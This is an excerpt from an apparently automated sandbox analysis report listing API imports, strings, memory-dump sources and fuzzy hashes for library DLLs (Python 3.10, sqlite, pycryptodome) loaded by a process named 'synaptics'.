                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9840ccab7224e0cce7cb710b583e171ef0dbf119e5b5ce8850cf04afb389f4a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5E06D725240019FDB19FF24DC40E1ABFE8EB05306F1400A9F85BC2977D722DA68EA22
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Py_MakePendingCalls.PYTHON310 ref: 6BF49ED7
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,Unhandled exception detected before entering Python.), ref: 6BF49EF7
                                                                                                                                                                                                                • Part of subcall function 6BF49BF0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?,6BF49F02,00000000), ref: 6BF49C09
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF49F05
                                                                                                                                                                                                              • Py_MakePendingCalls.PYTHON310 ref: 6BF49F07
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Unhandled exception detected before entering Python., xrefs: 6BF49EF0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CallsMakePending$ClearErr___acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                              • String ID: Unhandled exception detected before entering Python.
                                                                                                                                                                                                              • API String ID: 3177434754-920423093
                                                                                                                                                                                                              • Opcode ID: 47081bb05044cedae50e887f1e7c38b215474e052d77423a570ebff31a490090
                                                                                                                                                                                                              • Instruction ID: 2125a7b094b0bea42cc3c3b1b038c7811430aed252d947a4ba37d25734fab413
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47081bb05044cedae50e887f1e7c38b215474e052d77423a570ebff31a490090
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78E07D33F501215BEB0073787D80F5ABB5CAF9A2287050062D604D313BEE24E50545F0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?PyWinObject_AsWCHARArray@@YAHPAU_object@@PAPAPA_WPAKH@Z.PYWINTYPES310(?,?,?,?), ref: 6BF49615
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF49678
                                                                                                                                                                                                              • PyErr_NoMemory.PYTHON310 ref: 6BF49689
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF4970A
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF49715
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Array@@Err_FreeMem_MemoryObject_U_object@@freemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1319254725-0
                                                                                                                                                                                                              • Opcode ID: d2034fc9584370e71ab84667cc6a8a6189c8879d439b32ac090ce84aaa1847a5
                                                                                                                                                                                                              • Instruction ID: 44437432bbc43c227d45499bae12a4cbd0dd473f2805570b9d0a71e811caab0e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2034fc9584370e71ab84667cc6a8a6189c8879d439b32ac090ce84aaa1847a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7341D6366043068FDB10DF18E980BAABBF5FF85304F458568EC8597223EB39E515CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3136044242-0
                                                                                                                                                                                                              • Opcode ID: 64a23c6456c68034d40e5852ff8e836050a1bc99b8495adac59ae1eb20376711
                                                                                                                                                                                                              • Instruction ID: 3a9e641863e494cd3997fded69c69af26cb9af7f45f6bf08ef181e177305bed6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64a23c6456c68034d40e5852ff8e836050a1bc99b8495adac59ae1eb20376711
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D216072901629ABCF218FD5CC40BAF3AF9EB81A98F114115F82457652D7319D638BD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF468DF
                                                                                                                                                                                                              • GetSecurityDescriptorLength.ADVAPI32(?), ref: 6BF468ED
                                                                                                                                                                                                              • GetSecurityDescriptorControl.ADVAPI32(?,?,?), ref: 6BF46912
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF46929
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BF46935
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DescriptorSecurity$ControlLengthfreemallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3383347431-0
                                                                                                                                                                                                              • Opcode ID: 7a74a951890e42295383f72c600f398b2ebdb9dbc12f8886d9b64646df381def
                                                                                                                                                                                                              • Instruction ID: 7601e2602e8188818800257d814e4137d5e2f87a425b34c01513b4de41df54d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a74a951890e42295383f72c600f398b2ebdb9dbc12f8886d9b64646df381def
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 460108B32052156BE700EF68EC84AEBBB9CEF61261B00817BF506C6152EB35D558C7A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(00000000,?,00000000,?,?,00000000,6BF45E8C,00000000,?,?), ref: 6BF474BF
                                                                                                                                                                                                              • GetSecurityDescriptorLength.ADVAPI32(?,00000000), ref: 6BF474D4
                                                                                                                                                                                                              • GetSecurityDescriptorControl.ADVAPI32(?,?,?), ref: 6BF474F8
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF4750F
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BF4751B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DescriptorSecurity$ControlLengthReferencemallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3412238872-0
                                                                                                                                                                                                              • Opcode ID: 44dd1ca9df3951b38d15feda890c0548cbc2833ad66d3340cb090eec7157700f
                                                                                                                                                                                                              • Instruction ID: 8334d4a961d8b51c19e8df66aea99d748dd28723ec7d34b18de81a985765fae3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44dd1ca9df3951b38d15feda890c0548cbc2833ad66d3340cb090eec7157700f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 790104B33012115BE300EB59EC44E77FBACEB91262B10842FF522C2521DB39D44887A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3617616757-0
                                                                                                                                                                                                              • Opcode ID: 901e971215b43e087ad011331cd3356ff08df0d8219c91cb69e67c34142fa299
                                                                                                                                                                                                              • Instruction ID: f40b110ae4f97f7aaddd73ba46f8caeef2d4e01978089a3ec98f0abaecfd81a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 901e971215b43e087ad011331cd3356ff08df0d8219c91cb69e67c34142fa299
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17112EF4A00B404BE7149EFAAC4474B73F8AF0133CF160718D9A287AD1F775E9069A61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyObject_GC_UnTrack.PYTHON310(?), ref: 6C0A8669
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A8685
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A8697
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A86A9
                                                                                                                                                                                                              • PyObject_GC_Del.PYTHON310(?), ref: 6C0A86C3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Object_$Track
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1013342477-0
                                                                                                                                                                                                              • Opcode ID: d63eddb1cb147051eff2fec057ab4c60bd45ac1aba76f50077c8fdd2610d483a
                                                                                                                                                                                                              • Instruction ID: f46ecfc061f0734456c6fe49c56d222639304eb2013cab7c9eb521e7f2d232b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d63eddb1cb147051eff2fec057ab4c60bd45ac1aba76f50077c8fdd2610d483a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B0175F0B016854BEA04DBE9DD0558633FCBE422787050725D96A97A91DB31F801CA55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86B11
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86B16
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86B1B
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86B20
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86B25
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6BF86B28
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 8d8daf9c873c10221c7ab1023cbd16027902c731f6d629940fd8c32e5de99d8b
                                                                                                                                                                                                              • Instruction ID: f2072f7a1575f5b69f18068ba4ab5367fbff110d4e15f4e0eb34dd3a58fb5c64
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d8daf9c873c10221c7ab1023cbd16027902c731f6d629940fd8c32e5de99d8b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1D0623691082AB7CA162B2BEC0495BBF76FF856B43550267E41C12934DB22A8B1DED1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(?,statement aborts at %d: [%s] %s,?,?,00000000), ref: 6C0F92A9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                              • API String ID: 632333372-3170954634
                                                                                                                                                                                                              • Opcode ID: c3c2b7bc73a4d5d465cf8427807bc612f5b835a4515776ecd9d580f187114595
                                                                                                                                                                                                              • Instruction ID: 06b31f31222010e443d6d5f8fa932521fb019a64ed81f3eb09d0659e4b694a10
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3c2b7bc73a4d5d465cf8427807bc612f5b835a4515776ecd9d580f187114595
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA515074E042058BDB04CFA4C9407EEB7F2AF88318F258165D92977B81CB35AD87CB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?,?,?,?,?,6BF83F4C,00000000,?,?,?), ref: 6BF852D8
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(carry == 0,D:\a\pycryptodome\pycryptodome\src\multiply_32.c,000000F9), ref: 6BF85434
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • carry == 0, xrefs: 6BF8542F
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\multiply_32.c, xrefs: 6BF8542A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassertmemset
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\multiply_32.c$carry == 0
                                                                                                                                                                                                              • API String ID: 2079180777-310092311
                                                                                                                                                                                                              • Opcode ID: 5148d78dc88a9fd9bf2a988bfc0269baed10903a4cbf9908b8390ef1d880c735
                                                                                                                                                                                                              • Instruction ID: 3022ac5e879b45bdaf9c281dbfd0d34461bf87e7dfa4736a37b6455b19910778
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5148d78dc88a9fd9bf2a988bfc0269baed10903a4cbf9908b8390ef1d880c735
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27519E76A043168FC704CF28C88095EB7F1BF88714F554A6DE996E7321E774EA198BC2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A459D
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C0A45B6
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,abstract class), ref: 6C0A45D7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocErr_Stringmemcpy
                                                                                                                                                                                                              • String ID: abstract class
                                                                                                                                                                                                              • API String ID: 4155950771-1623945838
                                                                                                                                                                                                              • Opcode ID: daf85b02cded0fe5ba8b2e8ea91e8f0e4ac04b21ec95ffeecc9621375eff65a1
                                                                                                                                                                                                              • Instruction ID: 01effe3d105cc2183e8f212bca0207779a25368e559d5740a68ad361e05c7cdc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: daf85b02cded0fe5ba8b2e8ea91e8f0e4ac04b21ec95ffeecc9621375eff65a1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31218C76604B00AFD710CFE9E880B85B7F4FF44369B14863AE55DC7A12DB32E5568B80
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,iiiiiiiii|i,?,?,?,?,?,?,?,?,?,?), ref: 6BF48404
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,year out of range), ref: 6BF48468
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_Err_ParseStringTuple
                                                                                                                                                                                                              • String ID: iiiiiiiii|i$year out of range
                                                                                                                                                                                                              • API String ID: 385655187-1001734015
                                                                                                                                                                                                              • Opcode ID: 6976e298c0cdb43465ac7d59dadb81faa12e9ce3c2efae66ab5f5c18dccb1a9d
                                                                                                                                                                                                              • Instruction ID: 853cf9b3ab8971d9f067e472b91eeb1b12f5b2366eddb4139418bd46227d9261
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6976e298c0cdb43465ac7d59dadb81faa12e9ce3c2efae66ab5f5c18dccb1a9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30219F779146049FD314CF44D884EA7B7E8FF5A344B104A6EF58686821E72AB6588BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(hs->curlen < BLOCK_SIZE,src/SHA1.c,0000010D), ref: 6C0522FF
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000040,?,?), ref: 6C05232A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3092314378.000000006C051000.00000020.00000001.01000000.00000028.sdmp, Offset: 6C050000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092106316.000000006C050000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092520115.000000006C054000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092720561.000000006C055000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092992757.000000006C056000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c050000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassertmemcpy
                                                                                                                                                                                                              • String ID: hs->curlen < BLOCK_SIZE$src/SHA1.c
                                                                                                                                                                                                              • API String ID: 785382960-330188172
                                                                                                                                                                                                              • Opcode ID: 3df0c43a418742bdde1470e138fde22dd126ea348cb61c37cd19400b4bb89f40
                                                                                                                                                                                                              • Instruction ID: ee83b521ec5ec069532c7e04bc8f3e27828117314154440df5c83e4fd6153b4f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3df0c43a418742bdde1470e138fde22dd126ea348cb61c37cd19400b4bb89f40
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F611C6726097449BE7248E99EA88747B3E8FF8071CF45082EE54A83D41D3F5F46C8B91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(hs->curlen < BLOCK_SIZE,src/MD5.c,000000EF), ref: 6BF3222F
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000040,?,?), ref: 6BF3225A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3079308505.000000006BF31000.00000020.00000001.01000000.00000037.sdmp, Offset: 6BF30000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079115779.000000006BF30000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079418715.000000006BF33000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079607016.000000006BF34000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079797292.000000006BF35000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf30000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassertmemcpy
                                                                                                                                                                                                              • String ID: hs->curlen < BLOCK_SIZE$src/MD5.c
                                                                                                                                                                                                              • API String ID: 785382960-3464417081
                                                                                                                                                                                                              • Opcode ID: 3b1a35c76888c13d2ce30e58b729ed78a94ff3181699d7600210f61ba3d14a51
                                                                                                                                                                                                              • Instruction ID: 22652a110625f5aab9eb8a4c6342e869cf31ed1e39237c8066d35c6e9ef94ac3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b1a35c76888c13d2ce30e58b729ed78a94ff3181699d7600210f61ba3d14a51
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D11A3736047648BF7209EA9ECC4747B3E8FB8031DF01092EE54A82D61D7BAE4588BD1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C7E93E8), ref: 6C0AD087
                                                                                                                                                                                                              • PyLong_AsLong.PYTHON310(?), ref: 6C0AD0BB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • one character bytes, bytearray or integer expected, xrefs: 6C0AD0E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
